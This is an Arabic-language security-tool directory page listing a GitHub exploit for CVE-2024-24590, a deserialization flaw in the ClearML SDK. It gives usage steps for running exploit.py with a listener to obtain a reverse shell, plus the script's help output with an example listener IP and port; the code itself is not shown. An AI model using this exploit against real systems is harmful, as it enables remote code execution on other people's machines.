Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/junnythemarksman/cve-2024-24590
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقأمن سلسلة التوريدأداة الوصول عن بعد
GitHubjunnythemarksman/cve-2024-24590

CVE-2024-24590

يمكن أن يحدث إلغاء تسلسل البيانات غير الموثوقة في الإصدارات من 0.17.0 إلى 1.14.2 من SDK العميل لمنصة ClearML من Allegro AI، مما يتيح لقطعة أثرية تم تحميلها بشكل ضار تشغيل كود عشوائي على نظام المستخدم النهائي عند التفاعل معها.

عرض المستودع
112منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-24590

يمكن أن يحدث إلغاء تسلسل البيانات غير الموثوقة في الإصدارات من 0.17.0 إلى 1.14.2 من حزمة SDK الخاصة بـ ClearML من Allegro AI، مما يتيح لقطعة أثرية تم تحميلها بشكل ضار تنفيذ تعليمات برمجية عشوائية على نظام المستخدم النهائي عند التفاعل معها.

الاستخدام

  1. قم بلصق بيانات الاعتماد المعطاة وقم بتشغيل clearml-init
  2. قم بتشغيل سكربت exploit.py في محطة طرفية واحدة وامتلك مستمعًا في محطة أخرى
  3. قد تحتاج إلى تشغيل الاستغلال عدة مرات للحصول على شيل عكسي
root@kitploit:~
usage: exploit.py [-h] -i IP -p PORT -P PROJECT

options:
  -h, --help  show this help message and exit
  -i IP       IP address of the listener
  -p PORT     Port number of the listener
  -P PROJECT  Name of the existing project

example: python exploit.py -i 10.10.14.60 -p 4444 -P 'Black Swan'

تفاصيل الاستغلال

  1. https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/
  2. https://www.cvedetails.com/cve/CVE-2024-24590/
تنزيل الأداة